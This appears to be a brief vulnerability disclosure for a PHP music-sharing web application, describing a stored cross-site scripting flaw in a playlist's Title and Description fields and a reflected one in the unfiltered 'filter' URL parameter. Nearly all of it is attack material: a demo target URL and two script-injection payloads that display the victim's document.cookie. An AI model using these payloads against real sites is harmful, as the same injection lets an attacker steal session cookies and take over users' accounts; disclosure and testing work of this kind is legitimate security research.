===Stored XSS=== Create a Playlist and then you can run any XSS payload on "Title" or "Description" input fields. Sample Payload for Stored XSS: "><script>alert(document.cookie);</script> === ===Reflected XSS=== The URL parameter is "filter" not filtered. http://phpsound.com/demo/index.php?a=explore&filter=XSS Sample Payload for XSS: </title><script>alert(document.cookie);</script> ===